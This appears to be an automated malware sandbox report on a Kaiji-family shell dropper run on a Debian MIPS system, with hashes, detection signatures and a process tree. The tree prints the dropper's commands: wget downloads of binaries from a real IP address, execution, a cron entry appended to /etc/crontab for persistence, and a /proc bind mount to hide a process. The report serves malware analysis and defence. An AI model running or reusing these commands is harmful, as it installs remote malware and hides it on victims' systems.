Analysis
-
max time kernel
150s -
max time network
148s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
16/04/2025, 18:46
Static task
static1
Behavioral task
behavioral1
Sample
download.sh
Resource
ubuntu1804-amd64-20250410-en
Behavioral task
behavioral2
Sample
download.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
download.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
download.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
download.sh
-
Size
2KB
-
MD5
544a2f391e2800bac07e883d902bcc75
-
SHA1
cea67c26c372d03b795bbba678569256385d3b83
-
SHA256
1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
-
SHA512
f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config
Signatures
-
Kaiji 2 IoCs
Kaiji payload
resource yara_rule behavioral3/files/fstream-1.dat Kaiji behavioral3/files/fstream-6.dat Kaiji -
Kaiji family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 779 chmod 820 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/linux_mips 780 download.sh /tmp/linux_mips 785 linux_mips /etc/32676 795 sh /tmp/linux_mipsel 821 download.sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/crontab sh -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 789 linux_mips -
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
pid Process 793 sh 830 sh -
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_mips File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_mips File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems mount File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 780 linux_mips 785 linux_mips 786 rm 791 wget 821 linux_mipsel 824 rm 725 rm 729 wget -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/linux_mips wget File opened for modification /tmp/linux_mipsel wget
Processes
-
/tmp/download.sh/tmp/download.sh1⤵
- Executes dropped EXE
PID:718 -
/bin/unameuname -s2⤵PID:720
-
-
/bin/unameuname -m2⤵PID:722
-
-
/bin/rmrm -f linux_mips2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/chmodchmod +x linux_mips2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/linux_mips./linux_mips2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:780 -
/tmp/linux_mips./linux_mips " "3⤵
- Changes its process name
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:785 -
/bin/sh/bin/sh -c "/etc/32676&"4⤵
- Executes dropped EXE
- Command and Scripting Interpreter: Unix Shell
PID:793
-
-
/usr/sbin/serviceservice crond start4⤵PID:796
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:798
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:800
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:802
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:804
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵PID:805
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:808
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:812
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:813
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:815
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:817
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:818
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:819
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:823
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:826
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:827
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
PID:828
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:829
-
-
-
/usr/local/sbin/systemctlsystemctl start crond.service4⤵PID:796
-
-
/usr/local/bin/systemctlsystemctl start crond.service4⤵PID:796
-
-
/usr/sbin/systemctlsystemctl start crond.service4⤵PID:796
-
-
/usr/bin/systemctlsystemctl start crond.service4⤵PID:796
-
-
/sbin/systemctlsystemctl start crond.service4⤵PID:796
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:796
-
-
/bin/sh/bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"4⤵
- Creates/modifies Cron job
- Command and Scripting Interpreter: Unix Shell
PID:830
-
-
/usr/bin/renicerenice -20 7854⤵PID:831
-
-
/bin/mountmount -o bind /tmp/ /proc/7854⤵
- Reads runtime system information
PID:832
-
-
/usr/sbin/serviceservice cron start4⤵PID:833
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:834
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:835
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:836
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:838
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵
- Reads runtime system information
PID:839
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:840
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:841
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:842
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:843
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:844
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
PID:846
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:848
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
PID:850
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:852
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:855
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:857
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:859
-
-
-
/usr/local/sbin/systemctlsystemctl start cron.service4⤵PID:833
-
-
/usr/local/bin/systemctlsystemctl start cron.service4⤵PID:833
-
-
/usr/sbin/systemctlsystemctl start cron.service4⤵PID:833
-
-
/usr/bin/systemctlsystemctl start cron.service4⤵PID:833
-
-
/sbin/systemctlsystemctl start cron.service4⤵PID:833
-
-
/bin/systemctlsystemctl start cron.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:833
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:862
-
-
-
-
/bin/rmrm -f linux_mipsel2⤵
- System Network Configuration Discovery
PID:786
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/chmodchmod +x linux_mipsel2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/linux_mipsel./linux_mipsel2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/rmrm -f linux_mipsel2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/rm/bin/rm /tmp/download.sh2⤵PID:825
-
-
/etc/32676/etc/326761⤵PID:795
-
/bin/sleepsleep 602⤵PID:799
-
-
/bin/sleepsleep 602⤵PID:901
-
-
/bin/sleepsleep 602⤵PID:912
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34B
MD5f5a3713282e43c200f30342f5ff5e2ea
SHA12b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA2566ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA5125bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013
-
Filesize
41B
MD52dd37fddcc243f5581c4ce62ef5fdfc8
SHA1f6adde2974e8b8b7e384b5556acbca3cc9d5b3f2
SHA256811d6a6fc9aba79ed06e118d1b06579d68dd81503dd05c469c05005dc828a62b
SHA5125dc0780584978253f7409adbfc9a83e52dd6c1667724df43dece254390c6fa66b5cf097b409cc1a4178f852061af1db99659cb3c6e61fb809a368fab6086775a
-
Filesize
90B
MD5e38a02404d480a130b22e468846d29ee
SHA1862cc7ead638d06282474432fd60cdaebc8a87c9
SHA256230b225ff7e6feaa217dcad9777d9503605a8a8f0fbd6020e3ad192d602c045e
SHA5124b063eb01136320c67f1a1bf01f7e68f6c9cf68755e70b450e20bbb73cc0504f8456418c8b22b3b164a98fbfff5b496558aaf3caa8ed08be83a1c1dac9c6beb8
-
Filesize
56B
MD5585f408444cbca746945f0cb63f2c3f0
SHA10e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596
-
Filesize
911B
MD59f3e861844e604c6c4c074d948aeeabf
SHA161d9060d95a41796eff5adeebab13038775506c5
SHA2568704842b0b1612a923d6c8660a3f08b9f05a0340328fc46f3a555ab40b41cbca
SHA512173bbf3d699c5948acd3cb7892a8bc1e467a4edaeb98765e0c792d2fabfa7ac29e06a02fbd3ac7ac2ada13769788151d38aa9b2baec9c086d570b4887b9057d5
-
Filesize
2.2MB
MD55ec2f6c412ccfcc16781a7f3f37fb474
SHA1912cb18493577a0b5c64d994f4b6bc05990ae390
SHA256e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c
SHA512ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f
-
Filesize
2.2MB
MD506a141032d508ea7639d82c044851727
SHA1e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b
SHA256d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55
SHA5128173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05
-
Filesize
240KB
MD597b5c6c1b307114efc38193175a343c3
SHA124015d4f95c6878ea5027c134eddebb7126b610f
SHA256b1a89f313023b476fc826d8fac689679504e61ae8e650681fb966e810ed34970
SHA512e5359f3e082f54f5cfd7afa7771d8724d161d48d09372f203bdca222a47a63919fdfb76b6db7fb8ff61e92f8fd04fdec962e94331ff12705cf53ce5e23d33180